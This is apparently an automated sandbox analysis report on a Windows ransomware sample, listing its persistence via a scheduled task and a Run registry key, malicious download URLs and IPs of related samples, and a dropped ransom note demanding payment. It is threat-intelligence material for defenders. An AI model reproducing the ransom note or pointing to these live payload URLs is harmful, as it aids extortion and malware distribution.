              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@23/1373@4/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 66
              • Number of non-executed functions: 272
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
              • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadFile calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • Report size getting too big, too many NtWriteFile calls found.
              • VT rate limit hit for: 66d5df681876c_file010924.exe
              TimeTypeDescription
              12:21:13API Interceptor1x Sleep call for process: 66d5df681876c_file010924.exe modified
              18:21:06Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe s>--Task
              18:21:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
              18:21:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.114.97.3firmware.armv5l.elfGet hashmaliciousUnknownBrowse
              • 188.114.97.3/
              firmware.i586.elfGet hashmaliciousUnknownBrowse
              • 188.114.97.3/
              play.exeGet hashmaliciousFormBookBrowse
              • www.playdoge.buzz/dkjp/
              SecuriteInfo.com.Trojan.DownLoader47.19820.5694.3811.exeGet hashmaliciousUnknownBrowse
              • rustmacro.ru/autoupdate.exe
              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
              • filetransfer.io/data-package/DGApDW0P/download
              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
              • filetransfer.io/data-package/DGApDW0P/download
              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • filetransfer.io/data-package/8hthkO24/download
              gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
              • joxi.net/4Ak49WQH0GE3Nr.mp3
              Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
              • www.coinwab.com/kqqj/
              file.exeGet hashmaliciousLummaCBrowse
              • joxi.net/4Ak49WQH0GE3Nr.mp3
              190.220.21.28CbLDghhFAW.exeGet hashmaliciousSmokeLoaderBrowse
              • yosoborno.com/tmp/
              8xFzJWrEIa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
              • sajdfue.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
              • sajdfue.com/files/1/build3.exe
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • nidoe.org/tmp/index.php
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              cajgtus.com3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
              • 190.13.174.94
              file.exeGet hashmaliciousBabuk, DjvuBrowse
              • 109.175.29.39
              file.exeGet hashmaliciousBabuk, DjvuBrowse
              • 58.151.148.90
              file.exeGet hashmaliciousBabuk, DjvuBrowse
              • 109.175.29.39
              setup.exeGet hashmaliciousBabuk, DjvuBrowse
              • 211.181.24.133
              setup.exeGet hashmaliciousBabuk, DjvuBrowse
              • 211.181.24.133
              setup.exeGet hashmaliciousBabuk, DjvuBrowse
              • 175.119.10.231
              setup.exeGet hashmaliciousBabuk, DjvuBrowse
              • 181.204.98.226
              setup.exeGet hashmaliciousBabuk, DjvuBrowse
              • 190.12.87.61
              TfsbrHNaOX.exeGet hashmaliciousDjvuBrowse
              • 78.89.199.216
              api.2ip.uatsnsd8pOvn.exeGet hashmaliciousBabuk, DjvuBrowse
              • 188.114.97.3
              3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousBabuk, DjvuBrowse
              • 188.114.96.3
              C0XWmZAnYk.exeGet hashmaliciousBabuk, DjvuBrowse
              • 188.114.96.3
              284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousBabuk, DjvuBrowse
              • 188.114.97.3
              setup.exeGet hashmaliciousBabuk, DjvuBrowse
              • 188.114.96.3
              e8997f96b91ab5ea1fed555a7d62369a8307b0cfcbd0e32c5e9a7e430ab42240.zipGet hashmaliciousDjvuBrowse
              • 188.114.97.3
              A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • 188.114.97.3
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUS66d5ddcec1520_shtr.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
              • 188.114.96.3
              66d5ddcbb9f86_vyre.exeGet hashmaliciousLummaC, VidarBrowse
              • 188.114.96.3
              Rfq_last_quater_product_purchase_order_import_list_2024_000000.cmdGet hashmaliciousGuLoader, RemcosBrowse
              • 104.21.2.94
              Shipping Documents.bat.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
              • 188.114.96.3
              SolaraBoostrapper.exeGet hashmaliciousBlank GrabberBrowse
              • 162.159.135.232
              Solara_Executorv2.1.exe.exeGet hashmaliciousLummaCBrowse
              • 188.114.97.3
              Setup_v1.47.exeGet hashmaliciousLummaCBrowse
              • 104.21.69.149
              https://forms.office.com/e/SK99GFntNY%9C%D1%96%D165qvqrYAVfmSXl6ObkQscukzhydtenmpez65qvqrYAVfmSXl6ObkQs?owla=529Kjosg2dGet hashmaliciousHTMLPhisherBrowse
              • 104.21.57.226
              05HbyP1HCy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 104.26.12.205
              UXJM4UoKhk.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 104.26.12.205
              AMXArgentinaSAARVertexgroup#Signature.pdfGet hashmaliciousUnknownBrowse
              • 23.76.39.75
              CbLDghhFAW.exeGet hashmaliciousSmokeLoaderBrowse
              • 190.220.21.28
              ExeFile (260).exeGet hashmaliciousEmotetBrowse
              • 190.220.19.82
              7HddY6rYkf.elfGet hashmaliciousMiraiBrowse
              • 200.80.200.184
              arm.elfGet hashmaliciousMiraiBrowse
              • 190.3.44.186
              https://bushelman-my.sharepoint.com/:b:/p/lance/ESXtc6Laa05KpaC4W3rpMEMBfLSUU1GZhgfhBL8opRqFHg?e=Wrw3leGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
              • 23.76.37.146
              [EXTERNAL] New file received.emlGet hashmaliciousHTMLPhisherBrowse
              • 23.76.37.146
              JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
              • 23.76.43.59
              8xFzJWrEIa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
              • 190.220.21.28
              SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeGet hashmaliciousPureLog Stealer, VidarBrowse
              • 23.76.43.59
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e1966d5ddcec1520_shtr.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
              • 188.114.97.3
              66d5ddcbb9f86_vyre.exeGet hashmaliciousLummaC, VidarBrowse
              • 188.114.97.3
              Rfq_last_quater_product_purchase_order_import_list_2024_000000.cmdGet hashmaliciousGuLoader, RemcosBrowse
              • 188.114.97.3
              Unlock_Tool_5.0.exeGet hashmaliciousPureLog Stealer, VidarBrowse
              • 188.114.97.3
              oEijqRFE2K.exeGet hashmaliciousGuLoaderBrowse
              • 188.114.97.3
              1RGKUwuqi0.exeGet hashmaliciousRemcos, PureLog Stealer, XRedBrowse
              • 188.114.97.3
              4Z8GoGGGLH.exeGet hashmaliciousGuLoaderBrowse
              • 188.114.97.3
              x64__installer___v4.8.6.msiGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              anziOUzZJs.exeGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              4Z8GoGGGLH.exeGet hashmaliciousGuLoaderBrowse
              • 188.114.97.3
              No context
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1381
              Entropy (8bit):4.87972850781078
              Encrypted:false
              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNKCzmFRqrs6314kA+GT/kF5M2/kJw3Rx:WZHfv0pfNAU5WEYNKCzPs41rDGT0f/k0
              MD5:242ED9093DBD2B45ED7A82B7BCCFEF72
              SHA1:FF3E9910D40999CA2F85F642F4AD7DDE53F9CFDE
              SHA-256:D8C1F5BD75A74514C114D902DD449FAE1ACAF6856B3EBD2BD6E3319BCE2ED968
              SHA-512:65196DA7590F9AC581160AFF99A15BAC5435A989EB48F668519CE31416DBE7BAA74DFFC446FFBA082AE9FC0AD26E3CEFBFAEAD245C81F4B7C72C2DB1605292F9
              Malicious:true
              Reputation:low
              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1381
              Entropy (8bit):4.87972850781078
              Encrypted:false
              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNKCzmFRqrs6314kA+GT/kF5M2/kJw3Rx:WZHfv0pfNAU5WEYNKCzPs41rDGT0f/k0
              MD5:242ED9093DBD2B45ED7A82B7BCCFEF72
              SHA1:FF3E9910D40999CA2F85F642F4AD7DDE53F9CFDE
              SHA-256:D8C1F5BD75A74514C114D902DD449FAE1ACAF6856B3EBD2BD6E3319BCE2ED968
              SHA-512:65196DA7590F9AC581160AFF99A15BAC5435A989EB48F668519CE31416DBE7BAA74DFFC446FFBA082AE9FC0AD26E3CEFBFAEAD245C81F4B7C72C2DB1605292F9
              Malicious:true
              Reputation:low
              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):42
              Entropy (8bit):4.737322779818596
              Encrypted:false
              SSDEEP:3:xUb4QGWnAov:43X
              MD5:0A0B65EFD0403D8049E8BC13A5A92B58
              SHA1:39B75647C1858C3EB4201BB49F6A25D81EBC6326
              SHA-256:D3A6217B5322D48720668DF2A4F9C3E958971806D178AACC233153376A290D12
              SHA-512:EC645F2859F490DBE7D380B34E508F9B905F9414AF3056FCCEBC2B3D73E3E959E47D1BB0BE5B67F9D7400CAFD3AF94E02C1303E2F233E406F7804786277028FD
              Malicious:false
              Reputation:low
              Preview:tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT..
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):342
              Entropy (8bit):7.214483145377063
              Encrypted:false
              SSDEEP:6:KW6L3esht5OLvQqtx/hKeB/xYAJeD4xitKMNjUsOszLq43ukIcii96Z:NK7tkr/hKI/BcD4xitRlzLqYukIcii9a
              MD5:13F7AC24B90CEDEE53C88145B3C1D2E7
              SHA1:556CEEACF2063B2EF028C07DC1ACF2D5B44094F5
              SHA-256:AC3196ABB6CFCADF92007D655E4457F0CBB538863E038315D42BB4769A693608
              SHA-512:7029EBAE0A0763C6014D8C48E4AA24C23F97FB4EB46C6CCB2C73ED5A47E915D3E60B50254969FF3A700D3C3859EE49FC937B83DFFB3FE86187CA1AF80AB8A1FE
              Malicious:false
              Reputation:low
              Preview:insec..3...mm...]Hv...=...j.]....F..K....k..[J.ZH..,..m......q...5..}#.(.r._..Gi.w..Nt.k.`...R...bX.A.D..<.z....Q.4........_.l...5.N~F._....-.....v..F.?3..P....K4!e..b.q.......c.:SvV....B...Q..y...W....i...m.1...J...=....t.v.&..."8.e....` b.J4.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):342
              Entropy (8bit):7.214483145377063
              Encrypted:false
              SSDEEP:6:KW6L3esht5OLvQqtx/hKeB/xYAJeD4xitKMNjUsOszLq43ukIcii96Z:NK7tkr/hKI/BcD4xitRlzLqYukIcii9a
              MD5:13F7AC24B90CEDEE53C88145B3C1D2E7
              SHA1:556CEEACF2063B2EF028C07DC1ACF2D5B44094F5
              SHA-256:AC3196ABB6CFCADF92007D655E4457F0CBB538863E038315D42BB4769A693608
              SHA-512:7029EBAE0A0763C6014D8C48E4AA24C23F97FB4EB46C6CCB2C73ED5A47E915D3E60B50254969FF3A700D3C3859EE49FC937B83DFFB3FE86187CA1AF80AB8A1FE
              Malicious:false
              Preview:insec..3...mm...]Hv...=...j.]....F..K....k..[J.ZH..,..m......q...5..}#.(.r._..Gi.w..Nt.k.`...R...bX.A.D..<.z....Q.4........_.l...5.N~F._....-.....v..F.?3..P....K4!e..b.q.......c.:SvV....B...Q..y...W....i...m.1...J...=....t.v.&..."8.e....` b.J4.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):631
              Entropy (8bit):7.659041599287089
              Encrypted:false
              SSDEEP:12:kaZ1dyrX+C6ptIJDighRMNpefb3Kl4PdLbCwisnjeHsAppukIcii9a:lsXR6fIPRMbeTK+dLbCwKHPsbD
              MD5:ED87DA39079545095A72344761AEBDF9
              SHA1:3E8512B02D13175EF19C7DF05B24A0546EACD673
              SHA-256:AC6BCB002B52CC39C7AD53060E2A658B2D2238F3D04536F82451BB778E3C5961
              SHA-512:04E5487563F1E372495C7310102ABFD49B2B110F4CB1CD8271FDDFF39A9CC82BE47E7DDBBA4B6D62B1FA5FE36301CDD1CD3EA66860854D009DC26D87BA0F0218
              Malicious:false
              Preview:2023/....H.qR..~.>..HZYf....[..G0.-/.eO.......}...m....._..(..S.=Vt.[.3..I.....9n"....M.(..^.Y.D..L...Ij......`{.7......g..`a?.9t..w....A.A3..Xw.T..\....i*..Dw\....,pV......ep.f.@=.....Rv...&...Ek.8.R..B.hA.....1..@o.y.......".Z.Is....d'....|..u.>2[$.{B...y..o.;....c{.*p....WV=b\...r<...uN.C..S#.2....O..5._..Hh.P>s......O....UO...}.&...).Jy.?..SUp..sB?+6.v=...Y.:..{.=.....H5T.....uD..........S.y.>n.x.....b.J....D....P.].-.Sk.[Or..:S.C%r.......>.F% ....5..g\.. ..G.7_.b...).?M.h(....MRz.........9.4M,..I..sy.u......i.....4......b.....<tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):631
              Entropy (8bit):7.659041599287089
              Encrypted:false
              SSDEEP:12:kaZ1dyrX+C6ptIJDighRMNpefb3Kl4PdLbCwisnjeHsAppukIcii9a:lsXR6fIPRMbeTK+dLbCwKHPsbD
              MD5:ED87DA39079545095A72344761AEBDF9
              SHA1:3E8512B02D13175EF19C7DF05B24A0546EACD673
              SHA-256:AC6BCB002B52CC39C7AD53060E2A658B2D2238F3D04536F82451BB778E3C5961
              SHA-512:04E5487563F1E372495C7310102ABFD49B2B110F4CB1CD8271FDDFF39A9CC82BE47E7DDBBA4B6D62B1FA5FE36301CDD1CD3EA66860854D009DC26D87BA0F0218
              Malicious:false
              Preview:2023/....H.qR..~.>..HZYf....[..G0.-/.eO.......}...m....._..(..S.=Vt.[.3..I.....9n"....M.(..^.Y.D..L...Ij......`{.7......g..`a?.9t..w....A.A3..Xw.T..\....i*..Dw\....,pV......ep.f.@=.....Rv...&...Ek.8.R..B.hA.....1..@o.y.......".Z.Is....d'....|..u.>2[$.{B...y..o.;....c{.*p....WV=b\...r<...uN.C..S#.2....O..5._..Hh.P>s......O....UO...}.&...).Jy.?..SUp..sB?+6.v=...Y.:..{.=.....H5T.....uD..........S.y.>n.x.....b.J....D....P.].-.Sk.[Or..:S.C%r.......>.F% ....5..g\.. ..G.7_.b...).?M.h(....MRz.........9.4M,..I..sy.u......i.....4......b.....<tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):678
              Entropy (8bit):7.677985590017326
              Encrypted:false
              SSDEEP:12:khNOv6KM8BGwhhG8JWKGiVbdJmMe9PtOglaiGqGVMkNm7YMOukIcii9a:qNOSH8lhhGzKRFTmFlOgwcGVm7YGbD
              MD5:1ADD747FED5B3EA8C43820A3AC3C4526
              SHA1:EB3E1E6ECE6454E63FFC27675F626413A6DC5BA1
              SHA-256:EE479574DDA11AE273FD38AFB6DE6462B648F97378B29CD9EE64215B0C2851EB
              SHA-512:A88BBE707225BD93B147AFC25EAB3C5E7F5CC4DE5026B691EFCC5B1327D4EBA6B622CEE809A058CCDE49F3B4E785A7C0C062DCF806C7D011A493738EA6DEE5F7
              Malicious:false
              Preview:2023/.#.a.. ..K.Sny.7...wa\...C........*....,L......C.P..O.....cVC.....x...28..=.1.pyv...Cy...e.(.f.z,|..Y....A.~....wT..<...f-?Y...'....!.n..$ .-.....gm..j........4mw...G@..`.........w.*.H..B.....Cg.a....~+Vw.W.;...>u.*..p...{.D......}.N...r......u|Yy.".c!.e...g...PC.p/...S)nd8E.?o...=.....^...n..+a.8......../.....BLgc.z.%.......V...s...'.RR...R.?\...W.a..W..1......]...H..bZ.....B...he...[P.....1;k...t.)r..|.....&.)c.a...'<..7.2{=.Xj(...9......zO..O....:I...t/.a.....zL..2 ....W$.h.o~*.9h)x..:f..]..s..x....J.jJP.+.l.|I..,.Z ..e.,Y7..n.8f..n.s&@..'Tsc..u.B.... ..=.Dtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):678
              Entropy (8bit):7.677985590017326
              Encrypted:false
              SSDEEP:12:khNOv6KM8BGwhhG8JWKGiVbdJmMe9PtOglaiGqGVMkNm7YMOukIcii9a:qNOSH8lhhGzKRFTmFlOgwcGVm7YGbD
              MD5:1ADD747FED5B3EA8C43820A3AC3C4526
              SHA1:EB3E1E6ECE6454E63FFC27675F626413A6DC5BA1
              SHA-256:EE479574DDA11AE273FD38AFB6DE6462B648F97378B29CD9EE64215B0C2851EB
              SHA-512:A88BBE707225BD93B147AFC25EAB3C5E7F5CC4DE5026B691EFCC5B1327D4EBA6B622CEE809A058CCDE49F3B4E785A7C0C062DCF806C7D011A493738EA6DEE5F7
              Malicious:false
              Preview:2023/.#.a.. ..K.Sny.7...wa\...C........*....,L......C.P..O.....cVC.....x...28..=.1.pyv...Cy...e.(.f.z,|..Y....A.~....wT..<...f-?Y...'....!.n..$ .-.....gm..j........4mw...G@..`.........w.*.H..B.....Cg.a....~+Vw.W.;...>u.*..p...{.D......}.N...r......u|Yy.".c!.e...g...PC.p/...S)nd8E.?o...=.....^...n..+a.8......../.....BLgc.z.%.......V...s...'.RR...R.?\...W.a..W..1......]...H..bZ.....B...he...[P.....1;k...t.)r..|.....&.)c.a...'<..7.2{=.Xj(...9......zO..O....:I...t/.a.....zL..2 ....W$.h.o~*.9h)x..:f..]..s..x....J.jJP.+.l.|I..,.Z ..e.,Y7..n.8f..n.s&@..'Tsc..u.B.... ..=.Dtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.762786094489833
              Encrypted:false
              SSDEEP:12:YKWGqg86CNR5AxfPRYmkDaApJGSsD5OOTkmy7mY17dI7utZVztcVh98bukIcii9a:YKWGqDP43KrVASsD5OO7yK+yuDVeVDbD
              MD5:47D8F121D1570D6D0E6C2210C672B6C9
              SHA1:D4123BB36C6CD593BB5735FAF8D4457D66199D77
              SHA-256:D25EBE103CC81D98895C1477AADB515F8D0969E9D5FFF65B5FE09894C7A554B3
              SHA-512:C1F97F5FFBEDA55F6883E750BE61AC36DF35A2C03391AAACB5D63E9181828C0E256A959B1740386DE57EDA2E8CF60FD5BA8B81537F97EF64912A7EA9711D2406
              Malicious:false
              Preview:{"os_.....9.........+9..9vj.".-d.F.U.8.:../....)..j..P..H...[s..\....3..^......+...,r...!.I........... b..1t...%..|z...F.\}..6'..?.0.s.b.......Y.OL...'....5...Qf..+S)....X...&........@..%....Qp.5..\x..q..2.A.N(.R..........(R'..-;..s...}.".n.0.c..o.9F.........W-.^...](..1.W~.V....,..)..@.D.J._...l..JH.,FM.....3..-...b...tx..6 ....]..r.A.V.J.....p...Q.9:H..t.,v4.kYH#.. 0.Y}.5.n.;.l.F.o.<.c.LfF.N......;1..YJ.q...h...q.....~.}Il$%.C.....7yty..8z.9l.d..H..."....7....<.6..G.4cdp...N...xT.N g...u..Z...Z.I.`.H..b..#\..Ip.........*.......n.....[.....Hs%SW2.c&.9..Q...9.>....R.i..'..@r...X.r......T..K...g...U.S.U.:....A<=~..Kq.t:m.F.. y.I....4$....-...P..vu...K......d..(%..x.j...VQ.R.&@`.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.762786094489833
              Encrypted:false
              SSDEEP:12:YKWGqg86CNR5AxfPRYmkDaApJGSsD5OOTkmy7mY17dI7utZVztcVh98bukIcii9a:YKWGqDP43KrVASsD5OO7yK+yuDVeVDbD
              MD5:47D8F121D1570D6D0E6C2210C672B6C9
              SHA1:D4123BB36C6CD593BB5735FAF8D4457D66199D77
              SHA-256:D25EBE103CC81D98895C1477AADB515F8D0969E9D5FFF65B5FE09894C7A554B3
              SHA-512:C1F97F5FFBEDA55F6883E750BE61AC36DF35A2C03391AAACB5D63E9181828C0E256A959B1740386DE57EDA2E8CF60FD5BA8B81537F97EF64912A7EA9711D2406
              Malicious:false
              Preview:{"os_.....9.........+9..9vj.".-d.F.U.8.:../....)..j..P..H...[s..\....3..^......+...,r...!.I........... b..1t...%..|z...F.\}..6'..?.0.s.b.......Y.OL...'....5...Qf..+S)....X...&........@..%....Qp.5..\x..q..2.A.N(.R..........(R'..-;..s...}.".n.0.c..o.9F.........W-.^...](..1.W~.V....,..)..@.D.J._...l..JH.,FM.....3..-...b...tx..6 ....]..r.A.V.J.....p...Q.9:H..t.,v4.kYH#.. 0.Y}.5.n.;.l.F.o.<.c.LfF.N......;1..YJ.q...h...q.....~.}Il$%.C.....7yty..8z.9l.d..H..."....7....<.6..G.4cdp...N...xT.N g...u..Z...Z.I.`.H..b..#\..Ip.........*.......n.....[.....Hs%SW2.c&.9..Q...9.>....R.i..'..@r...X.r......T..K...g...U.S.U.:....A<=~..Kq.t:m.F.. y.I....4$....-...P..vu...K......d..(%..x.j...VQ.R.&@`.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3947
              Entropy (8bit):7.955532323314491
              Encrypted:false
              SSDEEP:96:nx+OSgL2MblUWn+iFMoJQZy3lLR7/AdFJboII7JUMxnhAVQ:nQ5MblRrFDlLea1UMphAVQ
              MD5:9EA0CF1CF1872D7140C47363AC78DD5F
              SHA1:6DCF7B4A788FE42CB12684F15772ED3BD8A77E22
              SHA-256:0FE765B398D54D732C4051235F7DD32520ADF1E3C067ADE7141A5742E577413B
              SHA-512:94A2F40EA5E19C2EDF4D58B1F7EE4C348FEDA5CEA181059321439F41B6D666C5024338FF51D6112072FA5E8627E7A776B48C0BBAD3BC80E78A2DDB43F566B2B9
              Malicious:false
              Preview:*...#...q..b..EK....;...2I...9.j....5.vhB...X....XWb.n...F4s...L...<.g......7...=..@..9.p.H......`.(=.L64Z.s....@!.....>.va.w2...q..c.[......o...p)...c.r..#V...yx.C.^...|_....nx1....u}..8].9y....q?Y....Nw8.S[lo...tdP.g...J.......{...m^.@..R|.}.6.}..\vS..o5.u.o...;{>r3..I]>...S...s.>......"0.;(..0...<.{.z..~#O..7.$M.Y1P.....U..].....c....R.w..e J.3..1.ok...V.o...%..Y...a.}..c.[\..b.X......].2.-.o#.`..........D..........0.l...|..O[._...N..u.Z[.....rZ.Il.c....hT..h.E.l.*.....;r%.t^..p.G.....~.7.7t>C..H.$...tc...e.!1kA.r....5...."...55r.....[.D...=.@.<^..D.2...(.z..b1.....%.*...!.........*..M6....|.".hI.s..Z.L+...v..B..>a.....a.F.G3(.Fm.3.........!u..p.D..ZSn.ojJs.pgh(C"=hJ.*.....qS...q7....eG.....R.}.G^..o(..:Z....e.~.b..H....U..,5.uN....W+. t.f........K#....|..x...S...0..........L}..Ck.UI.Y...o..~W...z...R.....u/..dzZ<,.a.O~8.cN.&.`4...yb....... ....{......_..2QR.UAUt.k/.fu5...k.1....|b...G.........N.;.>8x...C.K,h.....OO.S...5^.L........\6....
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3947
              Entropy (8bit):7.955532323314491
              Encrypted:false
              SSDEEP:96:nx+OSgL2MblUWn+iFMoJQZy3lLR7/AdFJboII7JUMxnhAVQ:nQ5MblRrFDlLea1UMphAVQ
              MD5:9EA0CF1CF1872D7140C47363AC78DD5F
              SHA1:6DCF7B4A788FE42CB12684F15772ED3BD8A77E22
              SHA-256:0FE765B398D54D732C4051235F7DD32520ADF1E3C067ADE7141A5742E577413B
